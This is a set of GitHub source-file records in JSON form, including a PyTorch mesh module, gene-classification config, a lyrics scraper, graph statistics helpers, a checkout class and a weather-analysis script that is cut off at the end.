#self.register_parameter(\"vertex\",nn.Parameter(vtx))\n self.register_parameter(\"texmap\",nn.Parameter(texmap))\n self.register_parameter(\"vertex_color\",nn.Parameter(vertex_color))\n \n self.register_buffer(\"vertex\",(vtx))\n self.register_buffer(\"uv\",uv)\n self.register_buffer(\"uv_idx\",uv_index)\n self.register_buffer(\"tri_idx\",tri)\n\n def forward(self,tri_idx,barycentric):\n tri=self.tri_idx[tri_idx]\n color=self.vertex_color[tri[0]]*barycentric[0]+self.vertex_color[tri[1]]*barycentric[1]+self.vertex_color[tri[2]]*barycentric[2]\n return color\n\n \n\n","repo_name":"Inn1917/arch_recon","sub_path":"src/models/mesh.py","file_name":"mesh.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"29205845251","text":"# -*-coding:utf-8-*-\nTest_dict = {\n \"ARGs\":\n {\"Category\": 20,\n \"label_list\": {0: 'Betalactams', 1: 'Trimethoprim', 2: 'MLS', 3: 'Fusidic acid', 4: 'Fosfomycin',\n 5: 'Aminoglycosides', 6: 'Fluoroquinolones', 7: 'Multi-drug resistance', 8: 'Glycopeptides',\n 9: 'Phenicol', 10: 'Rifampin', 11: 'Tetracyclines', 12: 'Peptide', 13: 'Bacitracin',\n 14: 'Sulfonamide', 15: 'Nucleosides', 16: 'Aminocoumarins', 17: 'Triclosan', 18: 'Mupirocin',\n 19: 'Others'},\n \"class_model\": \"Pretrained_model/ARGs_class.pkl\",\n \"group_model\": \"Pretrained_model/ARGs_group.pkl\",\n \"CoreEmbedding\": 'Pretrained_model/resistance_gene/Core_DataBase/CoreEmbedding.txt',\n \"Core\": \"Pretrained_model/resistance_gene/Core_DataBase/core.txt\"\n },\n \n \"VFs\":\n {\"Category\": 46,\n \"label_list\": {0: 'Toxin', 1: 'Adherence and invasion', 2: 'Secretion system & effectors', 3: 'Motility',\n 4: 'Superantigen', 5: 'Iron uptake', 6: 'Regulation', 7: 'Immune evasion', 8: 'Capsule',\n 9: 'Antiphagocytosis', 10: 'Mammalian cell entry (mce) operons', 11: 'Endotoxin',\n 12: 'Serum resistance', 13: 'Autotransporter', 14: 'Unclassified', 15: 'Biofilm formation',\n 16: 'Antimicrobial activity', 17: 'Enzyme', 18: 'Immune modulator',\n 19: 'Variable surface lipoprotein', 20: 'Quorum sensing', 21: 'Cell surface components',\n 22: 'Magnesium uptake', 23: 'Glycosylation system', 24: 
'Stress adaptation',\n 25: 'Catabolism of cholesterol', 26: 'Acid resistance', 27: 'Amino acid and purine metabolism',\n 28: 'Lipid and fatty acid metabolism', 29: 'Biosurfactant', 30: 'Manganese uptake',\n 31: 'Nutritional factor ', 32: 'Anti-apoptosis factor', 33: 'Anaerobic respiration',\n 34: 'Secreted proteins', 35: 'Copper uptake', 36: 'Phagosome arresting',\n 37: 'Intracellular survival', 38: 'Macrophage inducible genes', 39: 'Efflux pump',\n 40: 'Bile resistance', 41: 'Surface protein anchoring', 42: 'Actin-based motility',\n 43: 'Nucleation-promoting factor', 44: 'Peptidoglycan modification', 45: 'Non-VFs'},\n \"class_model\": \"Pretrained_model/VFs_class.pkl\",\n \"group_model\": \"Pretrained_model/VFs_group.pkl\",\n \"CoreEmbedding\": 'Pretrained_model/virulence_factor/Core_DataBase/CoreEmbedding.txt',\n \"Core\": \"Pretrained_model/virulence_factor/Core_DataBase/core.txt\"\n }\n}\n","repo_name":"emblab-westlake/FunGeneTyper","sub_path":"Config/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2720,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"23341244442","text":"#!/usr/bin/python3\n# dark-scraper.py\n\n# Downloads the lyrics for all the songs in a darklyrics page\n# for an artist.\n# Usage: dark-scraper.py []\n# or: dark-scraper.py []\n\nimport sys\nimport re\nimport threading\nfrom urllib.request import urlopen\nfrom queue import PriorityQueue\n\nfrom bs4 import BeautifulSoup\n\nif len(sys.argv) != 3 and len(sys.argv) != 2:\n print('Usage: {} []'.format(sys.argv[0]), file=sys.stderr)\n sys.exit(1)\n\n# Thread-safe print function\n__print_lock = threading.Lock()\n__p = print\ndef print(*args, **kwargs):\n with __print_lock:\n __p(*args, **kwargs)\n\ndef scrape_from_html(album_html):\n \"\"\"\n Given a string containing the html of an album, scrape\n the lyrics from it\n \"\"\"\n soup = BeautifulSoup(album_html, 'html.parser')\n header = soup.find('h2').get_text()\n content = soup.find('div', class_='lyrics')\n\n thanks = content.find('div', class_='thanks')\n if thanks:\n thanks.decompose()\n\n note = content.find('div', class_='note')\n if note:\n note.decompose()\n\n #get rid of the 'ARTIST LYRICS' thing\n regex = re.compile(r'[A-Z ]*LYRICS')\n blocks = regex.split(content.get_text())\n\n text = '*'*(len(header)+4)\n text = text + '\\n' + '* '+header+' *'\n text = text + '\\n' + '*'*(len(header)+4)\n\n for block in blocks:\n text = text + '\\n' + block\n\n return text\n\n# called by each thread\ndef get_url(q, url, index):\n print('Scraping: {}'.format(url), file=sys.stderr)\n try:\n album_html = urlopen(url).read().decode('utf-8')\n q.put((index, album_html))\n except Exception as e:\n print('get_url: Error in page: {}\\n{}'.format(url, e), file=sys.stderr)\n\ndef main():\n # Figure out the URL to use\n source_arg = sys.argv[1]\n if source_arg.startswith('http://'):\n url = source_arg\n elif source_arg.startswith('www.'):\n url = 'http://'+source_arg\n elif source_arg.startswith('darklyrics.com'):\n url = 'http://www.'+source_arg\n else:\n source_arg = source_arg.lower().replace(' ', '')\n url = 'http://www.darklyrics.com/{}/{}.html'.format(source_arg[0], source_arg)\n\n # Read artist page\n print('Accessing {}'.format(url), file=sys.stderr)\n\n with urlopen(url) as ufd:\n artist_html = ufd.read().decode('utf-8')\n\n artist_re = re.compile(r'\".*#1\"')\n artist_mo = artist_re.findall(artist_html)\n\n album_urls = [s.replace('..', 'http://www.darklyrics.com')[1:-3] for s in artist_mo]\n\n # 
Create threads to download and scrape each page\n q = PriorityQueue()\n threads = []\n for i, url in enumerate(album_urls):\n thread = threading.Thread(target=get_url, args=(q, url, i))\n thread.daemon = True\n thread.start()\n threads.append(thread)\n\n # Wait for all urls to download\n for thread in threads:\n thread.join()\n\n # File to store output in\n file_name = None\n if len(sys.argv) == 2:\n artist_soup = BeautifulSoup(artist_html, \"html.parser\")\n file_name = artist_soup.find(\"title\").get_text() + \".txt\"\n else:\n file_name = sys.argv[2]\n fd = open(file_name, \"w\")\n\n # Go through the queue\n while not q.empty():\n try:\n index, album_html = q.get()\n text = scrape_from_html(album_html)\n print(text, file=fd)\n except Exception as e:\n print(\"Error scraping from html: {}\".format(album_html), file=sys.stderr)\n print(e, file=sys.stderr)\n\n\n fd.close()\n\nif __name__ == '__main__':\n main()\n","repo_name":"medakk/darklyrics-scraper","sub_path":"darklyrics-scraper.py","file_name":"darklyrics-scraper.py","file_ext":"py","file_size_in_byte":3631,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"54"} +{"seq_id":"3105240493","text":"import numpy as np\nimport os\nfrom pyfastaq import sequences as pyfs\nfrom pyfastaq import tasks as pyftasks\nimport pandas as pd\nfrom collections import Counter\nimport igraph\n\n\ndef debruijn_fasta_to_igraph(fastafile):\n unitigs = pyfs.file_reader(fastafile)\n G = igraph.Graph().as_directed()\n\n ids = []\n min_counts = []\n all_edges = []\n\n for entry in unitigs:\n items = [x for x in entry.id.split(' ') if len(x) > 0]\n id_ = items[0]\n min_counts.append(min([int(x) for x in items[4].split(',')]))\n edges = [x for x in items if x[0:2] == 'L:']\n\n G.add_vertex(name=id_,\n )\n\n edges_to_add = [(id_, \"%s%s\" % (e.split(':')[3].replace('+', ''), e.split(':')[2])) for e in edges]\n all_edges.extend(edges_to_add)\n\n G.add_edges(all_edges)\n G.vs[\"min_count\"] = min_counts\n return G\n\n\ndef strongly_connected_components_description(dir):\n connected = 0\n single = 0\n\n for file in os.listdir(dir):\n comp_graph = os.path.join(dir, file)\n G = debruijn_fasta_to_igraph(comp_graph)\n scc = G.clusters(mode=\"strong\")\n sizes = np.array(scc.sizes())\n big_scc = set(np.where(sizes > 1)[0])\n if len(big_scc) > 0:\n #print(comp_graph, [(x, sizes[x]) for x in big_scc])\n big_sizes = [str(sizes[x]) for x in big_scc]\n print(f\"{comp_graph} has {len(big_sizes)} cycle(s) of sizes\", \", \".join(big_sizes))\n connected += 1\n else:\n single += 1\n print(f\"{connected} weakly connected components in {dir} contain cycle.\")\n\n\ndef covered_base_number(assembly_dir,\n orig_data=\"../../dataset_foxo_19_11/Selex2_S1_L001_R1_001.fasta\"):\n fasta = pyfs.file_reader(orig_data)\n base_number_orig = 0\n for entry in fasta:\n base_number_orig += len(entry.seq)\n print(f\"Original file: {base_number_orig}\")\n\n base_number_assem = 0\n for csv in os.listdir(assembly_dir):\n df = pd.read_csv(os.path.join(assembly_dir, csv), sep=';', header=None)\n df.columns = ['sq', 'count']\n lengths = df['sq'].apply(lambda row: len(row))\n counts = lengths * df[\"count\"]\n base_number_assem += counts.sum()\n print(f\"Assembled files: {base_number_assem}\")\n print(f\"Coverage of data: {base_number_assem / base_number_orig}%\")\n\n\ndef component_size_histogram(dir):\n sq_nos = Counter()\n for file in os.listdir(dir):\n comp_file = os.path.join(dir, file)\n no = pyftasks.count_sequences(comp_file)\n sq_nos[no] += 1\n return 
sq_nos\n\n\ndef get_candidates_for_separate_learning(dir, min_node_count=100, min_forking_part=0.3, for_view=True):\n candidates = []\n for file in os.listdir(dir):\n comp_graph = os.path.join(dir, file)\n G = debruijn_fasta_to_igraph(comp_graph)\n\n if G.vcount() >= min_node_count:\n a = Counter(G.outdegree())\n forks = sum([a[i] for i in [2, 3, 4]]) # at least two sufficiently abundant variants follow\n\n # candidates for separate learning\n if forks / G.vcount() >= min_forking_part:\n if for_view:\n candidates.append(os.path.join(dir.strip('/')+'_pictures', file+'.pdf'))\n else:\n candidates.append(comp_graph)\n return candidates","repo_name":"Caeph/paperfly","sub_path":"decomposition/statistics.py","file_name":"statistics.py","file_ext":"py","file_size_in_byte":3332,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"18393304168","text":"# 1이 될 때까지 (최소 횟수)\n# n 이 1이 될때까지 두가지 연산 반복 (1. N에서 1을 뺀다 2. n을 k로 나눈다 ) 단, 2의 연산은 n 이 k로 나누어 떨어질때 가능하다.\n\nn, k = map(int, input().split())\nresult = 0\n\n# n 이 k 이상일때 k로 나누기\nwhile n >= k:\n # n 이 k 로 나누어 떨어질때까지 1 빼기\n while n % k != 0:\n n -= 1\n result += 1\n n //= k\n result += 1\n\n# 남은 n에 대해서 1 빼기\nwhile n > 1:\n n -= 1\n result += 1\n\nprint(result)","repo_name":"choheejin/Study_Algorithm","sub_path":"preparation/TilOne.py","file_name":"TilOne.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30008242598","text":"import json\n\n\nwith open('food_services.json', mode='r', encoding='UTF-8') as json_file:\n rows = json.load(json_file)\n areas, institution = {}, {}\n\n for row in rows:\n areas.setdefault(row['District'], 0)\n areas[row['District']] += 1\n if row['IsNetObject'] == 'да':\n institution.setdefault(row['OperatingCompany'], 0)\n institution[row['OperatingCompany']] += 1\n\nprint(*max(areas.items(), key=lambda x: x[1]), sep=': ')\nprint(*max(institution.items(), key=lambda x: x[1]), sep=': ')\n","repo_name":"lockiz/-stepik_tests_course","sub_path":"4_Working_with_files/json_step_15/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2315905784","text":"import re\nimport json\n\nfrom Item import Item\n\nclass Checkout():\n \"\"\"\n This object runs the store.\n It creates and stores Items in the store and maintains a cart for customers to track their purchases.\n \"\"\"\n def __init__(self):\n self.store = []\n self.cart = []\n\n \"\"\" If an Item is not already in the store, this will add it to the store. \"\"\"\n def add_item_to_store(self, name, price_per_unit, unit_type):\n for item in self.store:\n if item.name == name:\n #Item is already in store\n raise(ValueError)\n self.store.append(Item(name, price_per_unit, unit_type))\n\n \"\"\" Retreives Item information for an Item in the store \"\"\"\n def get_item_information(self, name):\n matches = list(filter(lambda x: x.name == name, self.store))\n if matches == []:\n return None\n else:\n return matches[0]\n\n \"\"\" Returns the list of Items in the store available for sale. \"\"\"\n def get_items_in_store(self):\n return self.store\n\n \"\"\" Returns the list of Items in the customer's cart to be purchased. \"\"\"\n def get_items_in_cart(self):\n return self.cart\n\n \"\"\" Scan an Item to indicate that the customer is purchasing it. 
\"\"\"\n def add_item_to_cart(self, name, quantity):\n item = self.get_item_information(name)\n if item is None or quantity < 0: raise(ValueError) #Throw an error if they scan something the store does not sell.\n item_in_cart = self.get_item_information_from_cart(name)\n if item_in_cart is not None:\n item_in_cart['quantity'] += quantity #If they have the same Item in their cart, increase the quantity.\n else:\n self.cart.append({\"item\": item, \"quantity\": quantity}) #If this is a new Item, add it to their cart.\n\n \"\"\" Get information about an Item in the cart. \"\"\"\n def get_item_information_from_cart(self, name):\n matches = list(filter(lambda x: x['item'].name == name, self.cart))\n if matches == []:\n return None\n else:\n return matches[0]\n\n \"\"\" Remove an Item or quantity of Items from the cart. \"\"\"\n def remove_item_from_cart(self, name, quantity):\n item_in_cart = self.get_item_information_from_cart(name)\n if item_in_cart is None or quantity < 1:\n raise(ValueError)\n elif item_in_cart['quantity'] > quantity:\n item_in_cart['quantity'] -= quantity\n elif item_in_cart['quantity'] == quantity:\n self.cart.remove(item_in_cart)\n else:\n raise(ValueError)\n\n \"\"\" Remove an item from the store. \"\"\"\n def remove_item_from_store(self, name):\n item_in_store = self.get_item_information(name)\n if item_in_store is None: raise(ValueError)\n self.store.remove(item_in_store)\n\n \"\"\" Calculates the checkout total using Item information, including specials and markdowns. \"\"\"\n def get_checkout_total(self):\n total = 0.0\n for item in self.cart:\n special = item['item'].get_special_price()\n if special is not None:\n special = special.lower()\n\n #Translate a \"free\" or \"half off\" discount into a percentage discount to deduplicate code.\n if \"free\" in special or \"half off\" in special:\n special = special.replace(\"free\",\"at %100 off\").replace(\"half off\",\"at %50 off\").replace(\"get\", \"items, get\")\n\n #I was not sure if this function is required if all Items of one type share a price and markdown conditions. I may refactor this later.\n if \"of equal or lesser value for\" in special:\n special = special.replace(\"of equal or lesser value for\",\"at\").replace(\",\",\" items,\")\n\n #Determine which special discount to apply.\n\n #Percentage discount special\n if re.search(r'^buy \\d+ items, get \\d+ at %\\d+ off', special):\n pattern = re.compile(r'^buy (?P\\d+) items, get (?P\\d+) at %(?P\\d+) off')\n match = pattern.match(special).groupdict()\n minimum_items = int(match['purchase_requirement']) + int(match['discounted_quantity'])\n percentage_discount = int(match['percentage_discount']) / 100.0\n\n #If there is a limit on the discount, only apply discount up to max.\n if re.search(r'^buy \\d+ items, get \\d+ at %\\d+ off. limit (\\d+)', special):\n pattern_with_limit = re.compile(r'^buy \\d+ items, get \\d+ at %\\d+ off. 
limit (?P\\d+)')\n match_with_limit = pattern_with_limit.match(special).groupdict()\n max_discount_sets = int(match_with_limit['limit']) / minimum_items\n max_discounted_items = max_discount_sets * int(match['discounted_quantity'])\n discounted_items = int(int(item['quantity']) / minimum_items) * int(match['discounted_quantity'])\n if discounted_items > max_discounted_items:\n discounted_items = max_discounted_items\n\n #Else, apply discount to all available Items of this type.\n else:\n discounted_items = int(int(item['quantity']) / minimum_items) * int(match['discounted_quantity'])\n full_price_items = int(item['quantity']) - discounted_items\n total += (item['item'].get_price() * full_price_items) + (item['item'].get_price() * (1 - percentage_discount) * discounted_items)\n\n # N for $N special\n elif re.search(r'^\\d+ for \\$\\d+', special):\n pattern = re.compile(r'^(?P\\d+) for \\$(?P\\d+)')\n match = pattern.match(special).groupdict()\n if item['quantity'] > int(match['quantity']):\n discount_count = int(item['quantity'] / int(match['quantity']))\n\n #Same as previous block, check for limit condition.\n if re.search(r'^^\\d+ for \\$\\d+. limit (\\d+)', special):\n pattern_with_limit = re.compile(r'^\\d+ for \\$\\d+. limit (?P\\d+)')\n match_with_limit = pattern_with_limit.match(special).groupdict()\n max_discount_sets = int(match_with_limit['limit']) / int(match['quantity'])\n if max_discount_sets < discount_count:\n discount_count = max_discount_sets\n remainder = item['quantity'] - (discount_count * int(match['quantity']))\n total += discount_count * float(match['price']) + item['item'].get_price() * remainder\n else:\n total += item['item'].get_price() * item['quantity']\n\n # Code left behind from deduplication, but left in comment in case I refactor the \"equal or less than \" conditions\n # elif re.search(r'^buy \\d+ items, get \\d+ of equal or lesser value for %\\d+ off', special):\n # pattern = re.compile(r'^buy (?P\\d+) items, get (?P\\d+) of equal or lesser value for %(?P\\d+) off')\n # match = pattern.match(special).groupdict()\n # print(\"Special: \", match)\n\n #There is no discount applied.\n else:\n total += item['item'].get_price() * item['quantity']\n return total\n\n \"\"\" Returns the Item in the form of a dictionary \"\"\"\n def dict(self):\n checkout_dict = {}\n checkout_dict['items_in_store'] = self.store\n checkout_dict['items_in_cart'] = self.cart\n return checkout_dict\n\n \"\"\" Returns the Item as JSON, to be used by API \"\"\"\n def json(self):\n checkout_dict = {}\n checkout_dict['items_in_store'] = [x.json() for x in self.store]\n checkout_dict['items_in_cart'] = [{\"item\": x['item'].json(), \"quantity\": x['quantity']} for x in self.cart]\n return json.dumps(checkout_dict)\n\n \"\"\" Get the list of items in the store as JSON. \"\"\"\n def get_store_as_json(self):\n return json.dumps({\"items_in_store\": [x.json() for x in self.store]})\n\n \"\"\" Get the list of items in the customer's cart as JSON. 
\"\"\"\n def get_cart_as_json(self):\n return json.dumps({\"items_in_cart\": [{\"item\": x['item'].json(), \"quantity\": x['quantity']} for x in self.cart]})\n","repo_name":"Savrimyi/CheckoutOrderTotal","sub_path":"Checkout.py","file_name":"Checkout.py","file_ext":"py","file_size_in_byte":8656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34325404696","text":"from datetime import *\r\nfrom typing import Any\r\n\r\nfrom meteostat import *\r\nfrom pandas import *\r\n\r\n\r\n# ----TEMP----VARIABLES\r\n\r\n# total_max_year_list = []\r\n# avg_high_max_year_list = []\r\n# avg_low_max_year_list = []\r\n# avg_medium_year_list = []\r\n# avg_high_min_year_list = []\r\n# avg_low_min_year_list = []\r\n# total_min_year_list = []\r\n# city_coords = []\r\ndef wind_parameters(place, period):\r\n city_coords = ['Sofia, Bulgaria', 42.6977028, 23.3217359]\r\n lat = city_coords[1]\r\n lon = city_coords[2]\r\n city = Point(lat, lon)\r\n years = period\r\n days_in_dev = 30\r\n delta_var = 0\r\n\r\n # ----WIND SPEED----VARIABLES\r\n\r\n windspd = []\r\n period_list = []\r\n vals_list_all_y = []\r\n keys_list = []\r\n vals_list = []\r\n count = 0\r\n season_list = ['ssn_1', 'ssn_2', 'ssn_3', 'ssn_4', 'ssn_5', 'ssn_6', 'ssn_7', 'ssn_8', 'ssn_9', 'ssn_10', 'ssn_11',\r\n 'ssn_12']\r\n season_val_list = [[], [], [], [], [], [], [], [], [], [], [], []]\r\n season_quant_list: list[int | Any] = []\r\n season_month_list = ['January', 'February', 'March', 'April', 'May', 'June', 'July', 'August', 'September',\r\n 'October',\r\n 'November', 'December']\r\n\r\n # -----WIND TEMP AND DIR----VARIABLES\r\n\r\n highest_vals_n_days_in_year = []\r\n highest_vals_collection = []\r\n\r\n # SET TIME PERIOD\r\n\r\n today = datetime.now()\r\n first_year = today.year - years\r\n firstday_of_period = datetime(first_year, 1, 1)\r\n delta = timedelta(days=(365 * 1))\r\n\r\n for i in range(1, years + 1):\r\n\r\n if i == 1:\r\n start = firstday_of_period\r\n end = firstday_of_period + delta\r\n else:\r\n start = firstday_of_period + ((i - 1) * delta)\r\n end = start + delta\r\n\r\n # Get daily data for 2018\r\n data = Daily(city, start, end)\r\n data = data.fetch()\r\n\r\n # WIND DATA TO LIST\r\n\r\n wspd_list = Series.tolist(data.wspd)\r\n # print(wspd_list)\r\n # print(len(wspd_list))\r\n wpgt_list = Series.tolist(data.wpgt)\r\n # print(wpgt_list)\r\n wdir_list = Series.tolist(data.wdir)\r\n # print(wdir_list)\r\n wpgt_list = Series.tolist(data.wpgt)\r\n # print(pdgt_list)\r\n tavg_list = Series.tolist(data.tavg)\r\n # print(tavg_list)\r\n\r\n # N DAYS WITH MAX WIND SPEED FOR THE YEAR\r\n\r\n help_list = []\r\n if i == 1:\r\n max_wspd_days = []\r\n mx = 0\r\n mx_minus_any = 0\r\n n_windy_days = 5\r\n\r\n mx = max(wspd_list)\r\n\r\n for k in range(n_windy_days):\r\n\r\n if mx in wspd_list:\r\n ix = wspd_list.index(mx)\r\n max_wspd_days.append(mx)\r\n max_wspd_days.append(ix)\r\n highest_vals_n_days_in_year = []\r\n highest_vals_n_days_in_year.append('Wind speed: ')\r\n highest_vals_n_days_in_year.append(mx)\r\n highest_vals_n_days_in_year.append('Year day: ')\r\n highest_vals_n_days_in_year.append(ix)\r\n highest_vals_n_days_in_year.append('Wind dir: ')\r\n highest_vals_n_days_in_year.append(wdir_list[ix])\r\n highest_vals_n_days_in_year.append('Temperature: ')\r\n highest_vals_n_days_in_year.append(tavg_list[ix])\r\n highest_vals_collection.append(highest_vals_n_days_in_year)\r\n\r\n help_list: list[int | Any] = []\r\n\r\n for j in range(len(wspd_list)):\r\n\r\n mx_minus_any 
= mx - wspd_list[j]\r\n if mx_minus_any > 0:\r\n help_list.append(mx_minus_any)\r\n else:\r\n pass\r\n\r\n mx_minus_any = min(help_list)\r\n mx = mx - mx_minus_any\r\n # print(highest_vals_collection)\r\n\r\n # print(max_wspd_days)\r\n\r\n # ZIP KEYS (WIND SPEED) WITH VALUES (DAY OF YEAR)\r\n\r\n keys_list = []\r\n vals_list = []\r\n for keyval in max_wspd_days:\r\n count += 1\r\n if count % 2 != 0:\r\n keys_list.append(keyval)\r\n elif count % 2 == 0:\r\n vals_list.append(keyval)\r\n\r\n max_wspd_days_dict = dict(zip(keys_list, vals_list))\r\n # print(max_wspd_days_dict)\r\n # print(keys_list)\r\n # print(vals_list)\r\n\r\n # TEMPERATURE AND DIRECTION FOR THE MAX SPEED DAYS\r\n\r\n # Deep-freeze: < - 15°C;\r\n # Freeze: - 15°C to 0°C\r\n # Cold: 0°C to 8.lists°C;\r\n # Cool: 8.lists°C to 15°C;\r\n # Room: 15°C to 25°C.\r\n # Warm: 25°C to 32°C.\r\n # Hot: 32° to 40°C\r\n # Excessive heat: > 40°\r\n\r\n temp_ranges = ['Deep-freeze', 'Freeze', 'Cold', 'Cool', 'Optimal', 'Warm', 'Hot', 'Excessive heat']\r\n temp_range_values = [0, 0, 0, 0, 0, 0, 0, 0]\r\n\r\n for o in range(years * n_windy_days):\r\n if highest_vals_collection[o][7] <= -15:\r\n temp_range_values[0] += 1\r\n elif -15 < highest_vals_collection[o][7] <= 0:\r\n temp_range_values[1] += 1\r\n elif 0 < highest_vals_collection[o][7] <= 8:\r\n temp_range_values[2] += 1\r\n elif 8 < highest_vals_collection[o][7] <= 15:\r\n temp_range_values[3] += 1\r\n elif 15 < highest_vals_collection[o][7] <= 25:\r\n temp_range_values[4] += 1\r\n elif 25 < highest_vals_collection[o][7] <= 32:\r\n temp_range_values[5] += 1\r\n elif 32 < highest_vals_collection[o][7] <= 40:\r\n temp_range_values[6] += 1\r\n elif highest_vals_collection[o][7] > 40:\r\n temp_range_values[7] += 1\r\n\r\n # DISTRIBUTION OF WINDY DAYS IN MONTHS\r\n\r\n delta_n_years = (end - start) * years\r\n delta_1_8 = delta_n_years.days / (12 * years)\r\n # print(delta_1_8)\r\n\r\n for per in range(12):\r\n\r\n if per == 0:\r\n period_list = [per, per + int(delta_1_8)]\r\n else:\r\n period_list.append(int((per * delta_1_8) + delta_1_8))\r\n # print(period_list)\r\n\r\n for wd in range(len(vals_list)):\r\n val_check = vals_list[wd]\r\n if period_list[per] <= val_check < period_list[per + 1]:\r\n season_val_list[per].append(val_check)\r\n\r\n cnt = 0\r\n for m in season_val_list:\r\n mm = len(season_val_list[cnt])\r\n season_quant_list.append(mm)\r\n cnt += 1\r\n\r\n broi = 0\r\n w = 0;\r\n sp = 0;\r\n su = 0;\r\n a = 0\r\n wdays_per_season_list = []\r\n for wdd in vals_list:\r\n\r\n if wdd >= 355 or wdd < 80:\r\n w += 1\r\n elif 80 <= wdd < 172:\r\n sp += 1\r\n elif 172 <= wdd < 265:\r\n su += 1\r\n elif 265 <= wdd < 354:\r\n a += 1\r\n broi += 1\r\n\r\n season_str_list = ['Winter', 'Spring', 'Summer', 'Autumn']\r\n wdays_per_season_list = [w, sp, su, a]\r\n\r\n # 1 MONTH AND 1 SEASON\r\n\r\n max_WD_month = max(season_quant_list)\r\n max_WD_season = max(wdays_per_season_list)\r\n max_WD_M_index = season_quant_list.index(max_WD_month)\r\n max_WD_S_index = wdays_per_season_list.index(max_WD_season)\r\n # print(max_WD_M_index)\r\n # print(max_WD_S_index)\r\n\r\n month = season_month_list[max_WD_M_index]\r\n season = season_str_list[max_WD_S_index]\r\n\r\n if city_coords[1] >= 0:\r\n hemisphere = 'Northern Hemisphere'\r\n else:\r\n hemisphere = 'Southern Hemisphere'\r\n\r\n # SECOND AND THIRD WINDY MONTHS\r\n\r\n se_qu_li = season_quant_list[:]\r\n m_mx = max(se_qu_li)\r\n windy_months = 5\r\n h_list = []\r\n windy_months_list = []\r\n\r\n # print(se_qu_li)\r\n\r\n for z in 
range(windy_months):\r\n if m_mx in se_qu_li:\r\n ii = se_qu_li.index(m_mx)\r\n windy_months_list.append(m_mx)\r\n windy_months_list.append(ii)\r\n se_qu_li[ii] = 0\r\n h_list: list[int | Any] = []\r\n\r\n for w in range(len(se_qu_li)):\r\n\r\n mx_minus_any = m_mx - se_qu_li[w]\r\n if mx_minus_any >= 0:\r\n h_list.append(mx_minus_any)\r\n else:\r\n pass\r\n\r\n mx_minus_any = min(h_list)\r\n m_mx = m_mx - mx_minus_any\r\n # print(season_quant_list)\r\n # print(se_qu_li)\r\n # print(windy_months_list)\r\n\r\n # NAMES OF OTHER WINDY MONTHS\r\n\r\n oth_months_list = []\r\n oth_speed_list = []\r\n\r\n for md in range(len(windy_months_list)):\r\n if md == 0 or md == 1:\r\n continue\r\n elif md > 2 and md % 2 != 0:\r\n ind = windy_months_list[md]\r\n oth_months_list.append(season_month_list[ind])\r\n oth_speed_list.append(season_quant_list[ind])\r\n else:\r\n continue\r\n\r\n # print(oth_months_list)\r\n oth_months_list_alltoend = oth_months_list[:-1]\r\n omla = str(oth_months_list_alltoend)\r\n omla = omla.replace(\"[\", \"\")\r\n omla = omla.replace(\"]\", \"\")\r\n omla = omla.replace(\"'\", \"\")\r\n # print(omla)\r\n oth_months_list_end = oth_months_list[-1]\r\n # print(oth_months_list_end)\r\n month_keys = ['January', 'February', 'March', 'April', 'May', 'June', 'July', 'August', 'September', 'October',\r\n 'November', 'December']\r\n month_values = season_quant_list\r\n month_quant_dict = {month_keys[i]: month_values[i] for i in range(len(month_keys))}\r\n\r\n season_keys = ['Winter', 'Spring', 'Summer', 'Fall']\r\n season_values = wdays_per_season_list\r\n season_quant_dict = {season_keys[i]: season_values[i] for i in range(len(season_keys))}\r\n\r\n print(f\"WINDS:\\n\")\r\n # print(f'Maximum speed {n_windy_days * years} windy days in the last {years} year (day number from the start of the year): \\n {vals_list}\\n')\r\n # print(f'List of year days separating averaged months {chr(8776)} {delta_1_8:.3f} days: \\n {period_list}\\n')\r\n # print(f'List of most windy days distributed by month in the last {years} years starting from January: \\n {season_val_list}\\n')\r\n print(\r\n f'Number of {n_windy_days * years} high speed windy days for a period of {years} years distributed by month: \\n {month_quant_dict}\\n')\r\n print(\r\n f'Number of {n_windy_days * years} high speed windy days for a period of {years} years distributed by season: \\n {season_quant_dict}\\n')\r\n print(f'The maximum wind speed for the {years} years period is {max(wspd_list)} km/h\\n')\r\n print(\r\n f'The most windy season for the {years} years period is the {season} ({hemisphere}) and the most windy month is {month}')\r\n print(f'Other months with high wind speed are {omla} and {oth_months_list_end}\\n')\r\n\r\n print(\r\n f'In {round(((temp_range_values[0] / (years * n_windy_days)) * 100), 2)} % of the cases the strongest winds are {temp_ranges[0]}')\r\n print(\r\n f'In {round(((temp_range_values[1] / (years * n_windy_days)) * 100), 2)} % of the cases the strongest winds are {temp_ranges[1]}')\r\n print(\r\n f'In {round(((temp_range_values[2] / (years * n_windy_days)) * 100), 2)} % of the cases the strongest winds are {temp_ranges[2]}')\r\n print(\r\n f'In {round(((temp_range_values[3] / (years * n_windy_days)) * 100), 2)} % of the cases the strongest winds are {temp_ranges[3]}')\r\n print(\r\n f'In {round(((temp_range_values[4] / (years * n_windy_days)) * 100), 2)} % of the cases the strongest winds are {temp_ranges[4]}')\r\n print(\r\n f'In {round(((temp_range_values[5] / (years * n_windy_days)) * 100), 2)} % of 
